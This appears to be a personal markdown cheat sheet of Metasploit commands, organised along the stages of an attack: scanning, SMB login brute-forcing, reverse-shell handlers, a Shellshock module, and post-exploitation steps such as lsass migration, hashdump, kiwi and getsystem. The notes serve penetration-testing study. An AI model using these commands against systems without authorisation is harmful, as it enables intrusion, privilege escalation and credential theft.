killchain-compendium/metasploit.md

2.0 KiB

Metasploit

Modules

  • Auxiliary scanners, crawlers and fuzzers
  • Encoders encode payloads
  • Evasion prepare payloads to circumvent signature based malware detection
  • NOPs various architectures
  • Payloads to run on target systems
    • Singles, inline payloads, for example generic/shell_reverse_tcp
    • Stagers, downloads the stages payloads
    • Stages, for example windows/x64/shell/reverse_tcp
  • Post postexploitation

Notes

  • Search via scope
search type:auxiliary <stuff>
  • Send exploit to background
run -z
  • check if target is vulnerable
  • setg sets variables globally
  • unset payload
  • Flush via unset all

Sessions

  • background or ctrl+z
  • Foreground via sessions -i <number>

Scanning

  • Portscan
search portscan
  • UDP Sweep via scanner/discovery/udp_sweep
  • SMB Scan via scanner/smb/smb_version and smb_enumshares
  • SMB login dictionary attack scanner/smb/smb_login
  • NetBios via scanner/netbios/nbname
  • HTTP version scanner/http/http_version

Database

  • Start postgres
  • msfdb init
  • db_status
  • Separate workspace -a <projectname>
  • Safe scans via db_nmap
  • Show hosts
  • Show services
  • Set RHOST values via hosts -R

Exploits

  • show targets
  • show payloads

Reverse Shells

  • Multihandler, set options
use exploit/multi/handler
set payload <payloadhandler>
  • Shellshock as an example
use multi/http/apache_mod_cgi_bash_env_exec

Post Exploitation

  • load kiwi
  • load python
  • Windows
    • list SAM database
    migrate <lsass.exe-PID>
    hashdump
    
    • enum shares
    post/windows/gather/enum_shares
    
  • Linux
    • use post/linux/gather/hashdump

Other Meterpreter stuff

  • Staged and in disguise running as another servicename
getpid
ps
  • Attempt to elevate privileges
getsystem
  • Use multi/handler or exploit and get an overview via show payloads
  • UserID via getuid